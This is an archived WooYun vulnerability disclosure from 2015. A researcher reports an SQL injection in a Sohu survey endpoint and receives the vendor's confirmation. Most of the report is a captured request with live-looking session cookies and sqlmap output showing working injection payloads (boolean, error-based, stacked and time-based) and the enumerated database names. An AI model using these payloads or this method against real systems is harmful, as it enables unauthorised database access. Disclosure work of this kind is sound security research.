乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-24: 细节已通知厂商并且等待厂商处理中 2015-05-25: 厂商已经确认,细节仅向厂商公开 2015-06-04: 细节向核心白帽子及相关领域专家公开 2015-06-14: 细节向普通白帽子公开 2015-06-24: 细节向实习白帽子公开 2015-07-09: 细节向公众公开
第三弹!
求公仔漏洞第三弹(三)之搜狐某站SQL注入,报名处,填写信息,抓包:
GET /Survey/submit?callback=jQuery203035808908636681736_1432457382472&sid=815&opts%5B2864%5D=asdasd&opts%5B2865%5D=asdasd&opts%5B2866%5D=asdasda&opts%5B2867%5D=13311111111&opts%5B2868%5D%5B%5D=8607&_=1432457382473 HTTP/1.1Host: appsurvey.focus.cnProxy-Connection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Referer: http://chanye.focus.cn/news/2015-04-30/6221522.htmlAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: webimid2="Bih7ngb1O/Z2FBHSojt3FTJEK8Z4JtBLcJSvtBN5nK/N6Tl1Ctri69dXZyhIZ/62FXa+kHlRCCU="; bjforumsaw67851912=2707; IPLOC=CN5100; SUV=1504021051181769; esf_recommend_unit_search=d7fddb5a18f2caf2b7684f6ee7dcea37YToyOntzOjc6ImNpdHlfaWQiO2k6MTtzOjEwOiJzZWFyY2hfY29uIjthOjE6e2k6MjthOjE6e3M6OToiaG91c2VUeXBlIjthOjE6e3M6MjoiaW4iO2E6Mzp7aTowO2k6MjI7aToxO2k6MjA7aToyO2k6MjE7fX19fX0%3D; bjforumsaw=526%2C2707; lzstat_uv=10630109082488956093|3428069; PHPSESSID=v7vg9811gk5s1rt9g4ofequlq1; _ga=GA1.2.1530492624.1427944125; lastdomain=1432647781|ZGVhbGVyLWJhdDY5MjEwQHNvaHUuY29tfENDODdGMkM5NUEzQkM2M0Y5RkMzQUIwOUVDNUE5NjYyQHFxLnNvaHUuY29tfA|sohu.com; __utmt=1; sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5MiUsJ2cmOiAsJ24mOiAsJ2kmOiAsJ3cmOiAsJ2gmOiAsJ2NmOiAsJ2UmOiAsJ20mOiB9; __utma=1.1530492624.1427944125.1431101698.1432457112.6; __utmb=1.13.10.1432457112; __utmc=1; __utmz=1.1432457112.6.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=site%3Achanye.focus.cn%20inurl%3A%3D%3D
[root@Hacker~]# Sqlmap Sqlmap -r E:\4.txt --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o[*] starting at 16:51:06[16:51:06] [INFO] parsing HTTP request from 'E:\4.txt'[16:51:07] [INFO] testing connection to the target URL[16:51:07] [INFO] testing if the target URL is stable. This can take a couple of seconds[16:51:08] [INFO] target URL is stable[16:51:08] [INFO] testing if GET parameter 'callback' is dynamic[16:51:08] [INFO] confirming that GET parameter 'callback' is dynamic[16:51:08] [INFO] GET parameter 'callback' is dynamic[16:51:08] [WARNING] heuristic (basic) test shows that GET parameter 'callback' might not be injectable[16:51:08] [INFO] testing for SQL injection on GET parameter 'callback'[16:51:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[16:51:08] [WARNING] reflective value(s) found and filtering out[16:51:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[16:51:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[16:51:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[16:51:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[16:51:13] [INFO] testing 'MySQL inline queries'[16:51:13] [INFO] testing 'PostgreSQL inline queries'[16:51:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[16:51:13] [INFO] testing 'Oracle inline queries'[16:51:13] [INFO] testing 'SQLite inline queries'[16:51:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'[16:51:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[16:51:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[16:51:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[16:51:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'[16:51:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[16:51:18] [INFO] testing 'Oracle AND time-based blind'[16:51:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'[16:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[16:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it usi[16:51:35] [WARNING] GET parameter 'callback' is not injectable[16:51:35] [INFO] testing if GET parameter 'sid' is dynamic[16:51:35] [INFO] confirming that GET parameter 'sid' is dynamic[16:51:35] [INFO] GET parameter 'sid' is dynamic[16:51:35] [INFO] heuristic (basic) test shows that GET parameter 'sid' might be injectable (possible DBMS: 'MySQL')[16:51:35] [INFO] testing for SQL injection on GET parameter 'sid'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y[16:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[16:51:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[16:51:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'[16:51:43] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'[16:51:44] [INFO] GET parameter 'sid' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable[16:51:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[16:51:44] [INFO] GET parameter 'sid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable[16:51:44] [INFO] testing 'MySQL inline queries'[16:51:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'[16:51:55] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 stacked queries' injectable[16:51:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[16:52:05] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 AND time-based blind' injectable[16:52:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[16:52:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) techniq[16:52:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'[16:52:12] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'[16:52:15] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'[16:52:17] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'[16:52:20] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'[16:52:23] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'[16:52:26] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'[16:52:28] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'[16:52:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'[16:52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 446 HTTP(s) requests:---Place: GETParameter: sid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 RLIKE IF(5132=5132,815,0x28)&opts[2864]=asdasd&opts[2865]=asdasd&opts Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND (SELECT 4934 FROM(SELECT COUNT(*),CONCAT(0x7165636671,(SELECT (CA Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: callback=jQuery203035808908636681736_1432457382472&sid=815; SELECT SLEEP(5)-- &opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=as Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND SLEEP(5)&opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=asdasda&o---[16:52:41] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[16:52:41] [INFO] fetching database names[16:52:41] [INFO] the SQL query used returns 2 entries[16:52:41] [INFO] retrieved: information_schema[16:52:42] [INFO] retrieved: surveyavailable databases [2]:[*] information_schema[*] survey[16:52:42] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 142 times[16:52:42] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha[16:52:42] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\appsurvey.focus.cn'
搜狐的同学,求个公仔好吗?这是第三洞了~,求鼓励,喜欢你们家的公仔,thx :)
危害等级:中
漏洞Rank:8
确认时间:2015-05-25 00:07
感谢支持。麻烦你提供下地址给你寄狐狸。
暂无